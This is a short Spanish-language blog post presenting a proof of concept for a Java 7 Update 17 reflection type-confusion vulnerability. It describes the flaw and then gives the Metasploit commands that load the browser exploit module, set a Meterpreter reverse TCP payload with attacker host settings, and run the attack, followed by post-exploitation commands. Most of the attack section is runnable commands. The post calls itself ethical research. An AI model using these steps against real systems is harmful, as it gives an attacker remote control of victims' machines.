Y nuevamente Java con sus bugs que afectan a la seguridad de nuestros entornos de trabajo bueno para algunos ya que para otros esto es una fuente mas para sus fechorias pero iremos a lo etico y hacer nuestras PoC, asi que en esta oportunidad venimos con una entrada desde  el mas allá bueno no del mas allá pero si esta vez con una desde eromang donde nos explica detenidamente, como explotarlo algo simple pero mas que importante para poder crecer.

Affected version(s) :

JDK and JRE 7 Update 17 and earlier

**Tested on Windows XP Pro SP3 **with :

JDK and JRE 7 Update 17

Description :

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :

use exploit/multi/browser/java\_jre17\_reflection\_types  
set SRVHOST 192.168.178.36  
set TARGET 1  
set PAYLOAD windows/meterpreter/reverse\_tcp  
set LHOST 192.168.178.36  
exploit  
  
getuid  
sysinfo  

Regards,

Snifer